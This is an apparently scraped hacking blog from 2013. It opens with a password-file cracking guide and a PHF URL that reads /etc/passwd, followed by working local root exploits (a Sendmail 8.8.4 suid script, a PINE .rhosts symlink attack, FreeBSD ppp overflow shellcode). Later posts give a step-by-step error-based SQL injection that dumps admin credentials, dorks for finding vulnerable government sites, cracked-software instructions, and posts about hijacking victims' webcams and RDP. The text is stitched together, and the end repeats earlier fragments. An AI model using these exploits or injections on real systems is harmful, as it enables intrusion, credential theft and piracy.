bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/
uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no access:/:
webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh
pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/
pin4geo:/bin/false
ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false

Shadowed password files have an "x" in the place of a password or
sometimes they are disguised as an * as well. Now that you know a little more about what the actual password file looks like you should be able to identify a normal encrypted pw from a shadowed pw file. We can now go on to talk about how to crack it.

Cracking a password file isn't as complicated as it would seem, although the files vary from system to system.

1.The first step that you would take is to download or copy the file.

2. The second step is to find a password cracker and a dictionary maker. Although it's nearly impossible to find a good cracker there are a few ok ones out there. I recomend that you look for Cracker Jack, John the Ripper, Brute Force Cracker, or Jack the Ripper. Now for a dictionary maker or a dictionary file... When you start a cracking prog you will be asked to find the the password file. That's where a dictionary maker comes in. You can download one from nearly every hacker page on the net. A dictionary maker finds all the possible letter combinations with the alphabet that you choose(ASCII, caps, lowercase, and numeric letters may also be added) . We will be releasing our pasword file to the public soon, it will be called, Psychotic Candy, "The Perfect Drug." As far as we know it will be one of the largest in circulation.

3. You then start up the cracker and follow the directions that it gives you.

The PHF Technique

Well I wasn't sure if I should include this section due to the fact that everybody already knows it and most servers have already found out about the bug and fixed it. But since I have been asked questions about the phf I decided to include it.

The phf technique is by far the easiest way of getting a password
file(although it doesn't work 95% of the time). But to do the phf all you do is open a browser and type in the following link:

http://webpage_goes_here/cgi-bin/phf...in/cat%20/etc/passwd

(You replace the webpage_goes_here with the domain)

So if you were trying to get the password file for

www.webpage.com

you would type:

http://www.webpage.com/cgi-bin/phf?Q...%20/etc/passwd

and that's it! You just sit back and copy the file(if it works).

Telnet and Exploits

Well exploits are the best way of hacking webpages but they are also more complicated then hacking through ftp or using the phf. Before you can setup an exploit you must first have a telnet proggie, there are many different clients you can just do a netsearch and find
everything you need. It??s best to get an account with your target(if possible) and view the glitches from the inside out. Exploits expose errors or bugs in systems and usually allow you to gain root access. There are many different exploits around and you can view each seperately. I??m going to list a few below but the list of exploits is endless.

This exploit is known as Sendmail v.8.8.4

It creates a suid program /tmp/x that calls shell as root. This is how you set it up:

cat << _EOF_ >/tmp/x.c
#define RUN "/bin/ksh"
#include
main()
{
execl(RUN,RUN,NULL);
}
_EOF_
#
cat << _EOF_ >/tmp/spawnfish.c
main()
{
execl("/usr/lib/sendmail","/tmp/smtpd",0);
}
_EOF_
#
cat << _EOF_ >/tmp/smtpd.c
main()
{
setuid(0); setgid(0);
system("chown root /tmp/x ;chmod 4755 /tmp/x");
}
_EOF_
#
#
gcc -O -o /tmp/x /tmp/x.c
gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c
gcc -O3 -o /tmp/smtpd /tmp/smtpd.c
#
/tmp/spawnfish
kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]
*"// |cut -d" " -f1`
rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c
sleep 5
if [ -u /tmp/x ] ; then
echo "leet..."
/tmp/x
fi

And now on to another exploit.

Im going to display the pine exploit through linux. By watching the process table with ps to see which users are running PINE, one can then do an ls in /tmp/ to gather the lockfile names for each user. Watching the process table once again will now reveal when each user quits PINE or runs out of unread messages in their INBOX, effectively deleting the respective lockfile.

C reating a symbolic link from /tmp/.hamors_lockfile to ~hamors/.rhosts(for a generic example) will cause PINE to create ~hamors/.rhosts as a 666 file with PINE's process id as its contents. One may now simply do an echo "+ +" > /tmp/.hamors_lockfile, then rm / tmp/.hamors_lockfile.

This was writen by Sean B. Hamor??For this example, hamors is the
victim while catluvr is the attacker:

hamors (21 19:04) litterbox:~> pine
catluvr (6 19:06) litterbox:~> ps -aux | grep pine
catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep pine
hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine
catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors
- -rw-rw-rw- 1 hamors elite 4 Aug 26 19:05 .302.f5a4
catluvr (8 19:07) litterbox:~> ps -aux | grep pine
catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep pine
catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /
tmp/.302.f5a4
hamors (23 19:09) litterbox:~> pine
catluvr (11 19:10) litterbox:~> ps -aux | grep pine
catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep pine
hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine
catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4
catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4
+ +
catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4
catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors
now on to another one, this will be the last one that I??m going to
show. Exploitation script for the ppp
vulnerbility as described by no one to date, this is NOT FreeBSD-SA-
96:15. Works on FreeBSD as tested.
Mess with the numbers if it doesnt work. This is how you set it up:
v
#include
#include
#include
#define BUFFER_SIZE 156 /* size of the bufer to overflow */
#define OFFSET -290 /* number of bytes to jump after the start
of the buffer */
long get_esp(void) { __asm__("movl %esp,%eax\n"); }
main(int argc, char *argv[])
{
char *buf = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
char execshell[] =
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\ x07\x89\x56\x0f" /
* 16 bytes */
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\ x0b\x89\xca\x52" /
* 16 bytes */
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" /*
20 bytes */
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\ x04\x07\x04"; /*
15 bytes, 57 total
*/
int i,j;
buf = malloc(4096);
/* fill start of bufer with nops */
i = BUFFER_SIZE-strlen(execshell);
memset(buf, 0x90, i);
ptr = buf + i;
/* place exploit code into the buffer */
for(i = 0; i < strlen(execshell); i++)
*ptr++ = execshell[i];
addr_ptr = (long *)ptr;
for(i=0;i < (104/4); i++)
*addr_ptr++ = get_esp() + OFFSET;
ptr = (char *)addr_ptr;
*ptr = 0;
setenv("HOME", buf, 1);
execl("/usr/sbin/ppp", "ppp", NULL);
}

Now that you've gotten root "what??s next?" Well the choice is up to you but I would recommend changing the password before you delete or change anything. To change their
password all you have to do is login via telnet and login with your new account. Then you just type: passwd and it will ask you for the old password first followed by the new one. Now only you will have the new pw and that should last for a while you can now upload you pages, delete all the logs and just plain do your.

HotSpot Shield Cracked full version (by SHAK)

2013-03-20T14:17:00.001+05:00

Hello guys now a days many internet users are searching the way to bypass all blocked websites and want to get access, so I found this latest cracked version on my fellow "MaDSHaK"'s blogger Shakzone.blogspot.com (a very useful blogger to get free cracked softwares I suggest you to visit) so for this crack version all credit goes to him.

Click Here To Download HotSpot Shield

How to install:

1) First go to C:\Windows\System32\drivers\etc and open hosts file with notepad. or editor.

2) Now paste the BELOW code just BELOW the last line of hosts file. i.e : 127.0.0.1 localhost

Code:

127.0.0.1 anchorfree.net
127.0.0.1 rss2search.com
127.0.0.1 techbrowsing.com
127.0.0.1 box.anchorfree.net
127.0.0.1 www.mefeedia.com
127.0.0.3 www.anchorfree.net
127.0.0.2 www.mefeedia.com
127.0.0.1 hsselite.com
127.0.0.1 www.hsselite.com

Example Here:

(Note: all these above sites are used when you use HotSpot Shield ,for the sake of this Method we are blocking them :p)

3) Now save This Host file and then Extract Your Downloaded file using Winrar

Click Here If You Dont have WinRar

5) Now you will notice i have given two setup file one is in File1 folder and the other is in File2 folder.

Now open File1 folder and install setup given in it...while installing UN CHECK THE OPTION LAUNCH AFTER INSTALLATION & UNCHECK THE TOOLBAR INSTALLING OPTION...and restart your PC.

6) After restarting without opening previous installed hotspot shield setup...install the setup given in File2 Folder.

This will upgrade the previous installtion & again as before unchecked the option for LAUNCH AFTER INSTALLATION & TOOLBAR.

7) Now Restart Your PC Again.

8) After Restarting...just double click or press connect now you are Using hotspot shield elite with no Ads/banner/Trial

Enjoy : D

Metasploit java applet attack on WAN (Internet) By Zahid Adeel

2013-03-18T20:02:00.000+05:00

Superb demo by Blackleets Team Member "Zahid Adeel" on metasploit java signed applet attack on WAN using PTCL router ..!! This time he's not gonna attack on LAN but WAN Internet attack Here is the video below. Enjoy ;)

If video is not playing Here is the link:

Direct to youtube:

Click Here

sql injection (double query eror based) by Ment@l Mind

2013-03-18T16:35:00.003+05:00

*** sql injection (double query eror based)***

ASLAM O ALAIKUM

Ment@l Mind Here !!

Today i will teach you how can we use sql injection(double query)

so for this first you need vuln site..

ok after getting a vuln site as a normal you get the column counts

suppose it has 4 columns so next your comand will be

www.vulnsite.com/index.php?id=-12 union select 1,2,3,4--

but when you press enter it gives eror :-0

the eror is

(select statment have diffrent numbers of column)

so now what??

dont be cunfused its time for using double query sql injection

so your command will look like this:-

www.site.com/index.php?id=-12+and+(select+1+from(select%0Acount(*),concat((select+concat(version())

+from+information_schema.tables+limit+0,1),floor(Rand(0)*2))

a+from+information_schema.tables+group+by+a)b)

and result will look like this

"Duplicate entry '5.0.92-community-log1' for key 1"

so here '5.0.92-community-log1' is sites version.

now we have to find sites current_user so our command will be:-

www.site.com/index.php?id=-12+and+(select+1+from(select%0Acount(*),concat((select+concat(current_user())

+from+information_schema.tables+limit+0,1),floor(Rand(0)*2))

a+from+information_schema.tables+group+by+a)b)

result

"Duplicate entry user+localhost1' for key 1"

ok now we will find tables name so our command will be:-

www.site.com/index.php?id=-12+and+(select+1+from(select%0Acount(*),concat((select+concat(table_name)

+from+information_schema.tables+limit+0,1),floor(Rand(0)*2))

a+from+information_schema.tables+group+by+a)b)

result will be

"duplicate entry 'table_name1' for key 1'

now keep incresing the limit you can find it near

((table_name)+from+information_schema.tables+limit+0,1) )

"here change the limit '0,1'to 1,1 then 2,1 untill you get the eror..""

ok now we will find tables which contains the data so our command will be:-

www.site.com/index.php?id=-12+and+(select+1+from(select%0Acount(*),concat((select+concat(table_name)

+from+information_schema.tables+where+table_schema=database()+limit+0,1),

floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)

result

"duplicate entry tablename1' for key 1"

so here again increase the limits value untill you get the table like auth,,user,,admin,,login etc

ok now suppose we have table name "user" so next step is to find columns of this table our command will be:-

www.site.com/index.php?id=-12+and+(select+1+from(select%0Acount(*),concat((select+concat(column_name)

+from+information_schema.columns+where+table_name=<hex value of table>+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)

result

"Duplicate entry 'column name1' for key 1'

again keep changing limits value untill you get columns like username,password

ok now we have columns username and password we need tha data inside the columns so our command will be:-

www.site.com/index.php?id=-12+and+(select+1+from(select%0Acount(*),concat((select+concat(username,0x3a,password)

+from+user+limit+0,1),floor(Rand(0)*2))a

+from+information_schema.tables+group+by+a)b)

result

"Duplicate entry 'admin:3d145b6d4827e1f25994a3da418419e41' for key 1"

now you have user and pass you can fuck the site ;)

sorry for my bad english.. hope it will help you

EXAMPLE OF SQL DOUBLE QUERY EROR BASED:

PostgreSQL injection by cep

2013-03-17T21:55:00.000+05:00

So here i have video demo of postgre sql injection video demo. i hope this will help you alot just enjoy this video here is the link below to download from mediafire:

Direct Download Link:

Click Here

Greetz: CEP

Hacking Victim's Web Cam (Video Demo by S.O.G)

2013-03-17T20:34:00.000+05:00

Well here is the superb demo by "Aitzaz Mohsin" which will show you how to hack victim's web cam's live streaming (Using Metasploit) it will help you alot so here is the video enjoy it ;)

(This video won't show you that how to hack victim's computer, This demo is based on after compromising with victim's computer ;) )

IF Video Not Playing:

Click Here

Find vulnerable sites like professionals (Dorks)

2013-03-17T10:35:00.001+05:00

Well This is Just short article about google dorks which tells you that how to find vulnerable site of specific country, not only vulnerable but government and high profiles sites. this is not written by me but provided by my friend i don't know the author of this tutorial but whoever is writer the credit totally goes to him.

List of Dorks!

[*] Finding Vuln SQLI sites via country code:

CODE:

inurl:*.php?id= site:RU

This will search for Russian sites with the site: dork and look for pages with ANYTHING.php?id=

[*] Targeting Specific Sites:

CODE:

inurl:**.php?id= site:www.target.com

This helps decrease the time it takes to find a vuln rather than looking manually through the whole site.

[*] The BIG stuff:

CODE:

.gov inurl:**.php?id= site:RU

As you may have guessed, yes this will look for Russian Government sites with ANYTHING.php?id= in the URL. Dont forget you can change **.php?id= to any of your favorite dorks like **.php?catid= etc..

[0x03] Conclusion:
Yes this was short and sweet but very helpful for beginners and those who are looking for new sites to hack. Get creative with your dorks. EX:

CODE:

intitle:Satellite Operations inurl:**.php?id= site:.gov.ru

Might Get a hit on a high profile site, use your imagination

3 Tips for Protection Against Keyloggers

2013-03-14T23:21:00.000+05:00

Here are the tips and tricks to protect yourself from the keyloggers

Enable Your Firewall:-

Firewalls don't stop the keyloggers from entering into your PC But hey can help in stopping the keyloggers from sending your information.It is always recommended that you install a good firewall software to protect your computer from unauthorized access.By default Microsoft windows firewall is enabled.

Use Good Antivirus Software And Avoid Downloading cracked Software's:-

Use good antivirus software's like Norton, McAfee or use the free ones like Avg,Avast, Avira. They certainly provide a lot of protection against keylogger. Using a special Anti spyware program also helps.And avoid downloading software's which have been cracked.Also avoid using torrents as much as you can because torrents is the hub of viruses and home of hackers.

Now Will Discuss ,

How to Fool Keyloggers:

If you believe that their is a keylogger in your system then you can do the following things to protect yourself

1) Instead of typing your username and password using your keyboard type it using On Screen Keyboard.On Windows Platform it can be opened By typing

osk in Run.

2)Type 2-3 random characters in your password field and then select it using your mouse,Now type your real password.This will add the random characters in front of the password recorded by keylogger and the keylogger is fooled by you for sending wrong password.

3) Keylogger runs in the background.Always check out for suspicious processes using task manger and end them.

This tips and tricks will help you out in protecting yourself from these harmful spywares

Regards,

Zulqurnain jutt

1000 best Hacking/Security Tutorials Collection

2013-03-10T15:31:00.001+05:00

Hello guys today am going to share a .rar file which contains 1000 tutorials in it. Regarding hacking, security , networking and other computer tricks.Some of you might have this file already because it's not actually collected by me but I got this file from my friend long time ago. And today am sharing this with you i hope you guys will like this. Here is the link below to direct download from Mediafire:

Direct Link To Download:

Click Here

I Hope you guys will like this Regards Ment@l Mind

Google hacks Video Tutorial

2013-03-03T12:22:00.000+05:00

Google Hacks is a tool , so this is basically just a tutorial by "JohnnyFartyPants" which will demonstrate the features of the tool and tell you how to use. You can do many things using this tools and also can make your own google dorks, not only dorks but can take advantage of google search engine to extract many personal data and files. So let me me give you the direct link to video and software to download from mediafire:

Download Link For Video:

Click Here

Download Link For Tool:

Click Here

SQL Injection hacking and pereventing video demo by Lee j Lawson

2013-03-01T19:54:00.001+05:00

As you already know that SQL Injection is very dangerous vulnerability and it's on top position in OWASP top 10 , here is very great video by Lee j Lawson (Penteration Tester) which will demostrate about the sql injection and will tell you how it can be harmfull using different SQL queries so here is the link below to direct download from mediafire:

Direct download Click the link below:

Click Here

How To Crack A WEP Encypted Wifi Network (Wifi Hacking)

2013-03-01T13:06:00.002+05:00

A Very Superb Live video demo of cracking wep and hacking wifi network by S.O.G the member of Blackleets Team, So here is the video below i hope you will enjoy the video:

If video not playing then here the here is the second link to youtube:

Second Link Here:

Click Here

Web Application Hacking All Techniques [Tags]

2013-02-27T13:58:00.000+05:00

Well i found a very informative thing by an alboraaq user "SilverSurfer" for this Thread , totally credit goes to him, And am putting the thread here. Ok in this thread all well known Web Application hacking techniques are mentioned . And just Tags (Not explanation) and this is very helpfull for all Web Ethical Hackers to know the all techniques and one thing that the guy (SilverSurfer) also mentioned is , if he missed any tag then sorry and notify. So Here is the list below:

This list below fits in category Parameter manipulation
    Arbitary File Deletion
    Code Execution
    Cookie Manipulation ( meta http-equiv & crlf injection )
    CRLF Injection ( HTTP response splitting )
    Cross Frame Scripting ( XFS )
    Cross-Site Scripting ( XSS )
    Directory traversal
    Email Injection
    File inclusion
    Full path disclosure
    LDAP Injection
    PHP code injection
    PHP curl_exec() url is controlled by user
    PHP invalid data type error message
    PHP preg_replace used on user input
    PHP unserialize() used on user input
    Remote XSL inclusion
    Script source code disclosure
    Server-Side Includes (SSI) Injection
    SQL injection
    URL redirection
    XPath Injection vulnerability
    EXIF

This list below fits in category MultiRequest parameter manipulation

    Blind SQL injection (timing)
    Blind SQL/XPath injection (many types)

This list below fits in category File checks

    8.3 DOS filename source code disclosure
    Search for Backup files
    Cross Site Scripting in URI
    PHP super-globals-overwrite
    Script errors ( such as the Microsoft IIS Cookie Variable Information Disclosure )

This list below fits in category Directory checks

    Cross Site Scripting in path
    Cross Site Scripting in Referer
    Directory permissions ( mostly for IIS )
    HTTP Verb Tampering ( HTTP Verb POST & HTTP Verb WVS )
    Possible sensitive files
    Possible sensitive files
    ******* fixation ( j*******id & PHPSESSID ******* fixation )
    Vulnerabilities ( e.g. Apache Tomcat Directory Traversal, ASP.NET error message etc )
    WebDAV ( very vulnerable component of IIS servers )

This list below fits in category Text Search Disclosure
    Application error message
    Check for common files
    Directory Listing
    Email address found
    Local path disclosure
    Possible sensitive files
    Microsoft Office possible sensitive information
    Possible internal IP address disclosure
    Possible server path disclosure ( Unix and Windows )
    Possible username or password disclosure
    Sensitive data not encrypted
    Source code disclosure
    Trojan shell ( r57,c99,crystal shell etc )
    ( IF ANY )Wordpress database credentials disclosure

This list below fits in category File Uploads

    Unrestricted File Upload

This list below fits in category Authentication

    Microsoft IIS WebDAV Authentication Bypass
    SQL injection in the authentication header
    Weak Password
    GHDB - Google hacking database ( using dorks to find what google crawlers have found like passwords etc )

This list below fits in category Web Services - Parameter manipulation & with multirequest

    Application Error Message ( testing with empty, NULL, negative, big hex etc )
    Code Execution
    SQL Injection
    XPath Injection
    Blind SQL/XPath injection ( test for numeric,string,number inputs etc )
    Stored Cross-Site Scripting ( XSS )
    Cross-Site Request Forgery ( CSRF )

Credit Goes to "SilverSurfer"

And soon when i will get time , i will try to explain some of these in my words. Regards

XAMP server problem apache and mysql not Sarting/Stoping [solved]

2013-02-26T14:34:00.000+05:00

Well 2 days ago i was having problem with xamp. My Mysql and apache was not running when i was clicking on start button on XAMP Contol panel. I was thinking that there might be some files missing. i deleted XAMP from my computer, then downloaded again but problem was still same.But 2 things helped me to solve this problem. let me share both with you this may help you. First check the snap shot below when i was trying to start Apache and mysql i was getting this messsage:

it was the same message that i was getting , first thing helped me i deleted all files from XAMP folder and downloaded this zip file and extracted all files in the same folder and my both services MYSQL and APACHE was working and you can get that zip file from here

Click Here

Extract all files in the same folder of XAMP.

and start it again it will work.

If Still Not Working or get the eror back after restarting computer then it must be the specific port is busy and another service is running on that port. which is by default are 443 and 80.

see if there is another program working on that ports then change that program's port

you can use this command to see all the port running:

"netstat -ano"

It will show windows something like this:

on left hand in red lines you can see port number's and on right hand you can see pid's of program. every program which are running hiddenly in your computer have unique PID (Process identity number) which changes every time. Using this number you can see what program is running on that port just see on the same line's where specific port is . for example on the ab
above pic you will see on line number one and on port no "80" the program which is running has PID no "2664"
Now goto task manager >select subcategory "services" and see which service is running on that 2664 pid. See the pic :

it's apache running now.

But if you have skype installed then skype uses "80" and "443" ports by defualt for incoming services so disable the skype for this and get the port 80 and 443 free. You Can do this by going into

Skype => Tools => Options => Advance => Connection and untick the line "Use port 80 and 443" . click save and restart skype as you can see the pic above.

and then start your apache and mysql.

and if your problem is APACHE and MYSQL neither staring Nor Stopping (When starts Then see the video link is below to youtube:

Direct Link To Youtube:

Click Here

10 More Hacking/security videos By Russian hackers

2013-02-25T15:09:00.000+05:00

Well i Hope you've liked the first part of the hacking/ Security videos By Russian Hackers, now this is the second part of that video series and it also contains 10 videos in it, am saying again that the videos is in Russian language but you will get the concept of the videos am pretty sure for this, And please dont take this blog in negative way. It's blog for security testers and you hacking tricks are also part of this. it's something like Black Hat Tricks for White Hat hackers so please use this knowledge in positive ways.

Here is the direct Link below to download:

Click Me

SQL DataBase for Pentesters

2013-02-24T17:36:00.000+05:00

**!!%%%%%% ::::::::::ASLAM-O-ALAIKUM::::::::::%%%%%%%!!**

**!!%%%%%% :::::: Ment@l Mind here::::::%%%%%%%!!**

************************************************** *****************************************
A LITTLE KNOWLEDGE ABOUT DATABASE (SQL SERVER)
************************************************** *****************************************

    sorry for my very bad english but i will try my best to make this tutorial good :)..

    ok let's talk about database..

    what is database..??

    * TO save some specific information or data in computer for agencies or some kinda institutes ..every institute or agency collect there data at one place(database) and then get the usefull results, the software use to collect all data is called database.

    basically there are two types of database:

    * Pc Database
    * Lan Databases

    *Pc database was used to store data of single user database.

    *Lan database was use to connect one pc with other for sharing data (with local area network).

    But they both were not so good becoz whenever you want to make changes in these databases you have to manage the whole data again..they had'nt auto araange system.

    But DR E.E.CODE (IBM worker) in 1970 intorduced the new type of database called "Relational Database".

    it was ,and it is most advance type of database with auto arrange,attributes,default systems,Relational operators,Domains, updated forms,tables,columns,rows etc etc

    The best example of RElational Database is SQL (Structured Query Language)

Now we will talk on SQl server Database:

If you are hacker then you must have knowledge about database and it's types..

ok come at the point on SQL:

This is very powerful language (structured query language) using this we can make our own database and can also make specific changes whenever needed it will not effect to the whole database.

Using this language we also can access to the database, can view data, can add data, delete data and can change data.

Features of sQL server :

1 = Database : We can make maximum 32767 databases on sql server..in which the minimum size of database is 512 kb and mximum size can be 1048516 tera bite.

2 = Tables: The maximum number of tables in one database can be 2 billion and the maximum number of columns can be 1024.

3 = Users Connection : 32767 users can access to the server.

SQL server have 4 duafult databases for it's own use:

1 : Master

2: Model

3: Tempdb

4: Msdb

and 2 users Databases:

1: Pubs

2: Northwind.

.................................................. ..........................................
Role of Master Database :

Master Database controls users database and operations of SQL server. Master database has it's own default 14 tables which is called system catalog:

* Sysaltfiles

* Syscacheobjects

* Syscharsets

* Sysconfigures

* Syscurconfigs

* Sysdatabases

* Syslanguages

* Sysdevices

* Syslockinfo

* Sysxlogins

* Sysmessages

* Sysperfinfo

* Sysprocess

* Sysservers

Role of Model Database:

MOdel database use as templates whenever a user makes a database the objects of model database automaticaly copy into the user's database..simply you can say every new database is a copy of model database..it has 17 default tables also called catalog :

* Sysallocations

* Syscolumns

* Sysdepends

* Sysfilegroups

* Sysfiles

* Sysforeignkeys

* Sysfulltextcatalogs

* Sysindexes

* Sysmembers

* Sysobjects

* Syspermissions

* Sysprotects

* Sysreferences

* Systypes

* Sysusers

Role of MSDB Database:

IT supports the server agent SQL... its also support the applications which is use for backup informations..SQL by itself automatical save history and backup into database it has 19 default tables i will write the name of tables in my next tutorial coz i forgot some of these names sorry for that :(

Role of Tempdb:

Tempdb is use to make temporary tables and there is just on Tempdb for all databases on SQL srever whenever a user left SQL server then it's temporary tables automaticaly disappears.

.................................................. ..........................................
:::::::::::::::Let's come at the hot part of this tutorial::::::::::::::

Getting Data From Database using Select Statement:

(SELECT) statement use to identify the tables or columns which contains data.

(FROM) statement use to tell from which table we want to get data.

(WHERE) clause use to tell the condition while getting data or use to filter data.

(ORDER BY) clause use to configure data.

(The combination of these statements can be the powerfull queries)

get data using SELECT statement:

(Note: we will talki here about SQL server Not about SQL injection)
************************************************** *****************************************
using this command you get the data from table

(SELECT * from table name)

(*) operator use to get information from all columns of selected table

For example : suppose you have table name (DATA)

there are 4 columns in it and every column contains a name, id and roll no e.g

column 1 = ||_MeNTaL-MiND_|| id:7 roll no:7

column 2 = -|Shiman0|- id:8 roll no:8

column 3 = sh4heen haxor id:9 roll no:9

column 4 = Rox.Root id:10 roll no:10

so whenevr you put this query on SQL query Analyzer :

SELECT * FROM data

you will get this result :
name.................................id........... ...................roll no:

Ment@l Mind...............7........................... ......7

H4xorL1fe...........................8...................... ...........8

PhpBugs......................9...................... ...........9

Dr Trojan..............................10.......... .....................10

it is just an example.

and if you want get data from specific column then command will be :

SELECT column name1,column name2,column name3 from table name

then you will get the data from specified columns.

************************************************** ******************************************
Using WHERE clause:

It is use to get filtered data or conditional data from table.

for example: if there is a table (users) and you want to get data of specific user for example there is user name (Mental)

and you want to get data of this user then use this query on your query analyzer:

SELECT * FROM users WHERE name = 'Mental'

(note here 'name' = column name in the table where 'mental' user is exist)

'WHERE' word is realy a powerfull you can also use Relational operators with where clause and the operators are :

'=' = equal to
'>' = Greater than
'<' = Less than
'>=' = Greater than or equal to
'<=' = less than or equal to
'<>' = not equal

in addition you can also use some keywords with "where" clause...and the keywords are :

* "ANY" (for a one specific value)

* "ALL" ( for all values )

* "AND" (for more than one condition)

* "OR" (for cheking one condition from two selected or specified conditions)

* "BETWEEN" (test or comparison between two values)

* "EXISTS" (statements for a value which is exists)

* "NOTEXISTS" (statements for a value which is not exists)

* "NOT BETWEEN" (statement for values which are not between the values mean which are not values)

* "IN" (state for values which are in range)

* "NOT IN" (state for values which are not in range)

* "LIKE" (state for values which are same)

* "NOT LIKE" (state for values which are not same)

* "IS NULL" (state for null value)

* "IS NOT NULL" (state for values which are not null or empty)

"I made this tutorial short and in several parts coz some peoples dont like long tutorials so the discussion will be continue in my next tutorial"

To be continued... details and examples of all these keyword and relational operators will be discussed in my next tutorial :)

************************************************** *****************
"Leecher's Don't make changes dont put your name"

Kernal Root Exploit's Collection

2013-02-23T13:09:00.000+05:00

A kernel root exploits collection provided by "Madleets

Security Team" 's Founder H4xorL1fe bro , it contains past 5

years of kernel root exploits 2006-2011,

Here is the link below to direct download from mediafire:

Direct Download:

Click Here

10 Best hacking Videos (Russian Language)

2013-02-22T12:06:00.000+05:00

My Friend Gave me this rar file which have 10 best hacking videos and good informative videos although the videos is in Russian Language , but you will easily understand the concept of video, here is the link below to direct download from Media Fire:

Direct download:

Click Here

Blackleets - White Hat Hackers

Transfer Money From a Bank Account to a PayPal Account

SALLAM its me Soldier Of God. Today i will be sharing with a very helpful tutorial

Transferring money from bank to paypal , verifying your paypal account, and then re sending money to

any third party.

http://www.youtube.com/watch?v=j7Q5_IuFoGE

Enabling RDP ON VICTIMS MACHINE

Hey Guys !Its me Aitezaz Known as Soldier Of God (SOG)

After Opening a Successful meterpreter session on victim's machine how to Enable RDP.

VIDEO LINK = http://www.youtube.com/watch?v=d-_cD2DgMFQ

Install Backtrack In Android Device full guide

(All of the programs mentioned above are free.)

Ok, now let's start:

* The first thing you need to do is install Busybox from Google play:

(AS you can see in the pic above)

* Install it, then open it when it's done, it will install some more things.When it's done, install Linux Installer from Google Play:

* Open Linux installer, then click on Install Guides from the list on your right hand side:

* When you click that, you'll see a list of Linux distros, click on Backtrack and you will see a screen with steps on how to install it. Now click on the second page of those steps, you will get a page that looks like this:

* Just click on "Download Image", and let it finish downloading.While it's downloading, open Google play and install Terminal Emulator, and Zarchiver.Terminal Emulator:

* Zarchiver:

* If it didn't recognize any distro, click on Setting > Edit then change the file path there to your backtrack image, the .img file that you extracted.When it finally say "backtrack" on the drop down list, click "Start Linux"

* Terminal Emulator will open, you just have to proceed with the installation steps, ask you for a new password, and some preferences. When it's done you will get a red "root@localhost~#" like the picture bellow:

You are now in backtrack!

* Now if you want backtrack in GUI, open Google play, and install Android VNC:

* Open It when it finishes installing, and it will look like this:

* Set to the same settings in the picture, but not the IP address, you can get your IP by opening backtrack terminal

Settings for VNC are:

Username: backtrackPassword: backtracIP: from the "ifconfig" command or just put 127.0.0.1Color Format: 24-bit

Add bidvertiser ads under Blogger's post title (Blogspot)

Find 0day's vulnerabilities in web application

Black Hat Hacking Videos

Make your computer Faster like professionals

it will scan . give it some time.

After it will show new window something like this:

click on clean up system files. it will ask your permission click ok and your disc will be leaned up.

2. Ok after that you should run virus scan on your computer. You can choose any good antivirus of your choice. But I suggest or recommend you to use security essentials from Microsoft (for windows)

Download Security Essentials:

Click Here

am not supposing to tell you how to install and run it. But one thing i would like to mention that your windows copy must be geniune to install this and after installing then first update this (Your computer must be connected with Internet to Update it)

Then run "Custom Scan" and after scanning you will get some options, select the option of your choice. It will cleanup all the harmful files from your computer to perform your PC well.

3. Ok final step is that there might be some registry files corrupted or something like that. That also can cause to slow down you pc speed. I Recommend another tool.

Download Advance system care:

Click Here

(Special thanks to " Raja Zulqernain " for providing this with keys. I recommend you to visit here on his blog www.h4ck3rcracks.blogspot.com to get cracked tools and games)

*After downloading and installing. You will see window something like this:

Did you see how many features it has ?

Ok now click on "Scan Now" as you can see in pic above. And wait a while until it scans the problems. After few minutes you will see new window something like this:

If you get this message "some problems found" then click on "Repair Now".

and I recommend to Restart Your computer after these operations and for sure your Pc speed will be increased as well.

Regards.

Rooting Web Pages without Exploit

1.The first step that you would take is to download or copy the file.

3. You then start up the cracker and follow the directions that it gives you.

The PHF Technique

Telnet and Exploits

This exploit is known as Sendmail v.8.8.4

And now on to another exploit.

C reating a symbolic link from /tmp/.hamors_lockfile to ~hamors/.rhosts(for a generic example) will cause PINE to create ~hamors/.rhosts as a 666 file with PINE's process id as its contents. One may now simply do an echo "+ +" > /tmp/.hamors_lockfile, then rm / tmp/.hamors_lockfile.

HotSpot Shield Cracked full version (by SHAK)

Click Here To Download HotSpot Shield

How to install:

Click Here If You Dont have WinRar

5) Now you will notice i have given two setup file one is in File1 folder and the other is in File2 folder.

